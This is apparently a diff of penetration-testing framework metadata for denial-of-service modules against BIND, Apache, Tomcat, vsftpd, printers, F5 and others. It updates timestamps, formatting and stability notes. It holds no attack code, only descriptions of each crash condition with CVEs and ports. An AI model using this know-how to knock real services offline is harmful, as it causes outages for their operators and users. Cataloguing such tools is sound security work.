+ "aliases": [],
"rank": 300,
"disclosure_date": "2016-09-27",
"type": "auxiliary",
@@ -13619,7 +13593,7 @@
"Alejandro Parodi",
"Infobyte Research Team"
],
- "description": "A defect in the rendering of messages into packets can cause named to\n exit with an assertion failure in buffer.c while constructing a response\n to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address\n isn't allowed to make queries.",
+ "description": "A defect in the rendering of messages into packets can cause named to\n exit with an assertion failure in buffer.c while constructing a response\n to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address\n isn't allowed to make queries.",
"references": [
"CVE-2016-2776",
"URL-http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html"
@@ -13627,14 +13601,10 @@
"platform": "",
"arch": "",
"rport": 53,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/dns/bind_tsig.rb",
"is_install_path": true,
"ref_name": "dos/dns/bind_tsig",
@@ -13642,19 +13612,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/dns/bind_tsig_badtime": {
"name": "BIND TSIG Badtime Query Denial of Service",
"fullname": "auxiliary/dos/dns/bind_tsig_badtime",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-05-19",
"type": "auxiliary",
@@ -13671,12 +13642,8 @@
"platform": "",
"arch": "",
"rport": 53,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/dos/dns/bind_tsig_badtime.rb",
@@ -13689,32 +13656,24 @@
"Stability": [
"crash-service-down"
],
- "SideEffects": [
-
- ],
- "Reliability": [
-
- ]
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/freebsd/nfsd/nfsd_mount": {
"name": "FreeBSD Remote NFS RPC Request Denial of Service",
"fullname": "auxiliary/dos/freebsd/nfsd/nfsd_mount",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC "
],
- "description": "This module sends a specially-crafted NFS Mount request causing a\n kernel panic on host running FreeBSD 6.0.",
+ "description": "This module sends a specially-crafted NFS Mount request causing a\n kernel panic on host running FreeBSD 6.0.",
"references": [
"BID-16838",
"OSVDB-23511",
@@ -13723,14 +13682,10 @@
"platform": "",
"arch": "",
"rport": 2049,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb",
"is_install_path": true,
"ref_name": "dos/freebsd/nfsd/nfsd_mount",
@@ -13738,19 +13693,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-os-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/ftp/vsftpd_232": {
"name": "VSFTPD 2.3.2 Denial of Service",
"fullname": "auxiliary/dos/ftp/vsftpd_232",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-02-03",
"type": "auxiliary",
@@ -13777,7 +13733,7 @@
"ftp"
],
"targets": null,
- "mod_time": "2023-05-25 21:21:49 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/ftp/vsftpd_232.rb",
"is_install_path": true,
"ref_name": "dos/ftp/vsftpd_232",
@@ -13788,25 +13744,17 @@
"Stability": [
"crash-service-down"
],
- "Reliability": [
- "repeatable-session"
- ],
- "SideEffects": [
-
- ]
+ "Reliability": [],
+ "SideEffects": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/hp/data_protector_rds": {
"name": "HP Data Protector Manager RDS DOS",
"fullname": "auxiliary/dos/hp/data_protector_rds",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-01-08",
"type": "auxiliary",
@@ -13814,7 +13762,7 @@
"Roi Mallo ",
"sinn3r "
],
- "description": "This module causes a remote DOS on HP Data Protector's RDS service. By sending\n a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous\n size for malloc().",
+ "description": "This module causes a remote DOS on HP Data Protector's RDS service. By sending\n a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous\n size for malloc().",
"references": [
"CVE-2011-0514",
"OSVDB-70617",
@@ -13823,14 +13771,10 @@
"platform": "",
"arch": "",
"rport": 1530,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/hp/data_protector_rds.rb",
"is_install_path": true,
"ref_name": "dos/hp/data_protector_rds",
@@ -13838,26 +13782,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/3com_superstack_switch": {
"name": "3Com SuperStack Switch Denial of Service",
"fullname": "auxiliary/dos/http/3com_superstack_switch",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2004-06-24",
"type": "auxiliary",
"author": [
"aushack "
],
- "description": "This module causes a temporary denial of service condition\n against 3Com SuperStack switches. By sending excessive data\n to the HTTP Management interface, the switch stops responding\n temporarily. The device does not reset. Tested successfully\n against a 3300SM firmware v2.66. Reported to affect versions\n prior to v2.72.",
+ "description": "This module causes a temporary denial of service condition\n against 3Com SuperStack switches. By sending excessive data\n to the HTTP Management interface, the switch stops responding\n temporarily. The device does not reset. Tested successfully\n against a 3300SM firmware v2.66. Reported to affect versions\n prior to v2.72.",
"references": [
"OSVDB-7246",
"CVE-2004-2691",
@@ -13866,14 +13811,10 @@
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/3com_superstack_switch.rb",
"is_install_path": true,
"ref_name": "dos/http/3com_superstack_switch",
@@ -13881,19 +13822,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/apache_commons_fileupload_dos": {
"name": "Apache Commons FileUpload and Apache Tomcat DoS",
"fullname": "auxiliary/dos/http/apache_commons_fileupload_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-02-06",
"type": "auxiliary",
@@ -13901,7 +13843,7 @@
"Unknown",
"ribeirux"
],
- "description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.",
+ "description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.",
"references": [
"CVE-2014-0050",
"URL-https://tomcat.apache.org/security-8.html",
@@ -13926,7 +13868,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_commons_fileupload_dos",
@@ -13934,19 +13876,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/apache_mod_isapi": {
"name": "Apache mod_isapi Dangling Pointer",
"fullname": "auxiliary/dos/http/apache_mod_isapi",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2010-03-05",
"type": "auxiliary",
@@ -13954,7 +13897,7 @@
"Brett Gervasoni",
"jduck "
],
- "description": "This module triggers a use-after-free vulnerability in the Apache\n Software Foundation mod_isapi extension for versions 2.2.14 and earlier.\n In order to reach the vulnerable code, the target server must have an\n ISAPI module installed and configured.\n\n By making a request that terminates abnormally (either an aborted TCP\n connection or an unsatisfied chunked request), mod_isapi will unload the\n ISAPI extension. Later, if another request comes for that ISAPI module,\n previously obtained pointers will be used resulting in an access\n violation or potentially arbitrary code execution.\n\n Although arbitrary code execution is theoretically possible, a\n real-world method of invoking this consequence has not been proven. In\n order to do so, one would need to find a situation where a particular\n ISAPI module loads at an image base address that can be re-allocated by\n a remote attacker.\n\n Limited success was encountered using two separate ISAPI modules. In\n this scenario, a second ISAPI module was loaded into the same memory\n area as the previously unloaded module.",
+ "description": "This module triggers a use-after-free vulnerability in the Apache\n Software Foundation mod_isapi extension for versions 2.2.14 and earlier.\n In order to reach the vulnerable code, the target server must have an\n ISAPI module installed and configured.\n\n By making a request that terminates abnormally (either an aborted TCP\n connection or an unsatisfied chunked request), mod_isapi will unload the\n ISAPI extension. Later, if another request comes for that ISAPI module,\n previously obtained pointers will be used resulting in an access\n violation or potentially arbitrary code execution.\n\n Although arbitrary code execution is theoretically possible, a\n real-world method of invoking this consequence has not been proven. In\n order to do so, one would need to find a situation where a particular\n ISAPI module loads at an image base address that can be re-allocated by\n a remote attacker.\n\n Limited success was encountered using two separate ISAPI modules. In\n this scenario, a second ISAPI module was loaded into the same memory\n area as the previously unloaded module.",
"references": [
"CVE-2010-0425",
"OSVDB-62674",
@@ -13967,14 +13910,10 @@
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/apache_mod_isapi.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_mod_isapi",
@@ -13982,19 +13921,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/apache_range_dos": {
"name": "Apache Range Header DoS (Apache Killer)",
"fullname": "auxiliary/dos/http/apache_range_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-08-19",
"type": "auxiliary",
@@ -14003,7 +13943,7 @@
"Masashi Fujiwara",
"Markus Neis "
],
- "description": "The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x\n through 2.2.19 allows remote attackers to cause a denial of service (memory and\n CPU consumption) via a Range header that expresses multiple overlapping ranges,\n exploit called \"Apache Killer\"",
+ "description": "The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x\n through 2.2.19 allows remote attackers to cause a denial of service (memory and\n CPU consumption) via a Range header that expresses multiple overlapping ranges,\n exploit called \"Apache Killer\".",
"references": [
"BID-49303",
"CVE-2011-3192",
@@ -14029,7 +13969,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-20 13:20:44 +0000",
"path": "/modules/auxiliary/dos/http/apache_range_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_range_dos",
@@ -14037,6 +13977,14 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "AKA": [
+ "Apache Killer"
+ ],
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -14054,9 +14002,7 @@
"auxiliary_dos/http/apache_tomcat_transfer_encoding": {
"name": "Apache Tomcat Transfer-Encoding Information Disclosure and DoS",
"fullname": "auxiliary/dos/http/apache_tomcat_transfer_encoding",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2010-07-09",
"type": "auxiliary",
@@ -14065,7 +14011,7 @@
"Hoagie ",
"Paulino Calderon "
],
- "description": "Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not\n properly handle an invalid Transfer-Encoding header, which allows remote attackers\n to cause a denial of service (application outage) or obtain sensitive information\n via a crafted header that interferes with \"recycling of a buffer.\"",
+ "description": "Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not\n properly handle an invalid Transfer-Encoding header, which allows remote attackers\n to cause a denial of service (application outage) or obtain sensitive information\n via a crafted header that interferes with \"recycling of a buffer.\"",
"references": [
"CVE-2010-2227",
"OSVDB-66319",
@@ -14074,14 +14020,10 @@
"platform": "",
"arch": "",
"rport": 8000,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_tomcat_transfer_encoding",
@@ -14089,19 +14031,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/brother_debut_dos": {
"name": "Brother Debut http Denial Of Service",
"fullname": "auxiliary/dos/http/brother_debut_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-11-02",
"type": "auxiliary",
@@ -14109,7 +14052,7 @@
"z00n <0xz00n@gmail.com>",
"h00die"
],
- "description": "The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial\n of Service (DoS) condition via a crafted HTTP request. The printer will be\n unresponsive from HTTP and printing requests for ~300 seconds. After which, the\n printer will start responding again.",
+ "description": "The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial\n of Service (DoS) condition via a crafted HTTP request. The printer will be\n unresponsive from HTTP and printing requests for ~300 seconds. After which, the\n printer will start responding again.",
"references": [
"CVE-2017-16249",
"URL-https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18730"
@@ -14133,7 +14076,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/brother_debut_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/brother_debut_dos",
@@ -14141,19 +14084,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/cable_haunt_websocket_dos": {
"name": "\"Cablehaunt\" Cable Modem WebSocket DoS",
"fullname": "auxiliary/dos/http/cable_haunt_websocket_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-01-07",
"type": "auxiliary",
@@ -14204,29 +14148,23 @@
"SideEffects": [
"ioc-in-logs"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/canon_wireless_printer": {
"name": "Canon Wireless Printer Denial Of Service",
"fullname": "auxiliary/dos/http/canon_wireless_printer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-06-18",
"type": "auxiliary",
"author": [
"Matt \"hostess\" Andreko "
],
- "description": "The HTTP management interface on several models of Canon Wireless printers\n allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:\n if this module is successful, the device can only be recovered with a physical\n power cycle.",
+ "description": "The HTTP management interface on several models of Canon Wireless printers\n allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:\n if this module is successful, the device can only be recovered with a physical\n power cycle.",
"references": [
"CVE-2013-4615",
"URL-https://www.mattandreko.com/2013/06/canon-y-u-no-security.html"
@@ -14250,7 +14188,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/canon_wireless_printer.rb",
"is_install_path": true,
"ref_name": "dos/http/canon_wireless_printer",
@@ -14258,26 +14196,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/dell_openmanage_post": {
"name": "Dell OpenManage POST Request Heap Overflow (win32)",
"fullname": "auxiliary/dos/http/dell_openmanage_post",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2004-02-26",
"type": "auxiliary",
"author": [
"aushack "
],
- "description": "This module exploits a heap overflow in the Dell OpenManage\n Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability\n exists due to a boundary error within the handling of POST requests,\n where the application input is set to an overly long file name.\n This module will crash the web server, however it is likely exploitable\n under certain conditions.",
+ "description": "This module exploits a heap overflow in the Dell OpenManage\n Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability\n exists due to a boundary error within the handling of POST requests,\n where the application input is set to an overly long file name.\n This module will crash the web server, however it is likely exploitable\n under certain conditions.",
"references": [
"URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html",
"BID-9750",
@@ -14287,14 +14226,10 @@
"platform": "",
"arch": "",
"rport": 1311,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/dell_openmanage_post.rb",
"is_install_path": true,
"ref_name": "dos/http/dell_openmanage_post",
@@ -14302,19 +14237,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/f5_bigip_apm_max_sessions": {
"name": "F5 BigIP Access Policy Manager Session Exhaustion Denial of Service",
"fullname": "auxiliary/dos/http/f5_bigip_apm_max_sessions",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -14323,7 +14259,7 @@
"Oleg Broslavsky ",
"Nikita Oleksov "
],
- "description": "This module exploits a resource exhaustion denial of service in F5 BigIP devices. An\n unauthenticated attacker can establish multiple connections with BigIP Access Policy\n Manager (APM) and exhaust all available sessions defined in customer license. In the\n first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP\n system creates a session, marks it as pending and then redirects the client to an access\n policy URI. Since BigIP allocates a new session after the first unauthenticated request,\n and deletes the session only if an access policy timeout expires, the attacker can exhaust\n all available sessions by repeatedly sending the initial HTTP request and leaving the\n sessions as pending.",
+ "description": "This module exploits a resource exhaustion denial of service in F5 BigIP devices. An\n unauthenticated attacker can establish multiple connections with BigIP Access Policy\n Manager (APM) and exhaust all available sessions defined in customer license. In the\n first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP\n system creates a session, marks it as pending and then redirects the client to an access\n policy URI. Since BigIP allocates a new session after the first unauthenticated request,\n and deletes the session only if an access policy timeout expires, the attacker can exhaust\n all available sessions by repeatedly sending the initial HTTP request and leaving the\n sessions as pending.",
"references": [
"URL-https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html"
],
@@ -14346,7 +14282,7 @@
"https"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb",
"is_install_path": true,
"ref_name": "dos/http/f5_bigip_apm_max_sessions",
@@ -14354,26 +14290,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/flexense_http_server_dos": {
"name": "Flexense HTTP Server Denial Of Service",
"fullname": "auxiliary/dos/http/flexense_http_server_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2018-03-09",
"type": "auxiliary",
"author": [
"Ege Balci "
],
- "description": "This module triggers a Denial of Service vulnerability in the Flexense HTTP server.\n Vulnerability caused by a user mode write access memory violation and can be triggered with\n rapidly sending variety of HTTP requests with long HTTP header values.\n\n Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.",
+ "description": "This module triggers a Denial of Service vulnerability in the Flexense HTTP server.\n Vulnerability caused by a user mode write access memory violation and can be triggered with\n rapidly sending variety of HTTP requests with long HTTP header values.\n\n Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.",
"references": [
"CVE-2018-8065",
"URL-https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS"
@@ -14381,14 +14318,10 @@
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/flexense_http_server_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/flexense_http_server_dos",
@@ -14396,19 +14329,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/gzip_bomb_dos": {
"name": "Gzip Memory Bomb Denial Of Service",
"fullname": "auxiliary/dos/http/gzip_bomb_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2004-01-01",
"type": "auxiliary",
@@ -14416,21 +14350,17 @@
"info ",
"joev "
],
- "description": "This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.\n Many applications will not implement a length limit check and will eat up all memory and\n eventually die. This can also be used to kill systems that download/parse content from\n a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).\n\n A FILEPATH datastore option can also be provided to save the .gz bomb locally.\n\n Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly\n deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)\n will generate a 300 byte gzipped file that expands to 10GB.",
+ "description": "This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.\n Many applications will not implement a length limit check and will eat up all memory and\n eventually die. This can also be used to kill systems that download/parse content from\n a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).\n\n A FILEPATH datastore option can also be provided to save the .gz bomb locally.\n\n Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly\n deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)\n will generate a 300 byte gzipped file that expands to 10GB.",
"references": [
"URL-http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html"
],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/gzip_bomb_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/gzip_bomb_dos",
@@ -14438,6 +14368,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -14451,9 +14386,7 @@
"auxiliary_dos/http/hashcollision_dos": {
"name": "Hashtable Collisions",
"fullname": "auxiliary/dos/http/hashcollision_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-12-28",
"type": "auxiliary",
@@ -14465,7 +14398,7 @@
"Krzysztof Kotowicz",
"Christian Mehlmauer "
],
- "description": "This module uses a denial-of-service (DoS) condition appearing in a variety of\n programming languages. This vulnerability occurs when storing multiple values\n in a hash table and all values have the same hash value. This can cause a web server\n parsing the POST parameters issued with a request into a hash table to consume\n hours of CPU with a single HTTP request.\n\n Currently, only the hash functions for PHP and Java are implemented.\n This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.\n It also generates a random payload to bypass some IDS signatures.",
+ "description": "This module uses a denial-of-service (DoS) condition appearing in a variety of\n programming languages. This vulnerability occurs when storing multiple values\n in a hash table and all values have the same hash value. This can cause a web server\n parsing the POST parameters issued with a request into a hash table to consume\n hours of CPU with a single HTTP request.\n\n Currently, only the hash functions for PHP and Java are implemented.\n This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.\n It also generates a random payload to bypass some IDS signatures.",
"references": [
"URL-http://ocert.org/advisories/ocert-2011-003.html",
"URL-https://web.archive.org/web/20120105151644/http://www.nruns.com/_downloads/advisory28122011.pdf",
@@ -14496,7 +14429,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/hashcollision_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/hashcollision_dos",
@@ -14504,19 +14437,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/ibm_lotus_notes": {
"name": "IBM Notes encodeURI DOS",
"fullname": "auxiliary/dos/http/ibm_lotus_notes",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-08-31",
"type": "auxiliary",
@@ -14532,14 +14466,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-03-22 12:52:15 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/ibm_lotus_notes.rb",
"is_install_path": true,
"ref_name": "dos/http/ibm_lotus_notes",
@@ -14547,6 +14477,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -14560,9 +14495,7 @@
"auxiliary_dos/http/ibm_lotus_notes2": {
"name": "IBM Notes Denial Of Service",
"fullname": "auxiliary/dos/http/ibm_lotus_notes2",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-08-31",
"type": "auxiliary",
@@ -14577,14 +14510,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/ibm_lotus_notes2.rb",
"is_install_path": true,
"ref_name": "dos/http/ibm_lotus_notes2",
@@ -14592,6 +14521,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -14605,9 +14539,7 @@
"auxiliary_dos/http/marked_redos": {
"name": "marked npm module \"heading\" ReDoS",
"fullname": "auxiliary/dos/http/marked_redos",
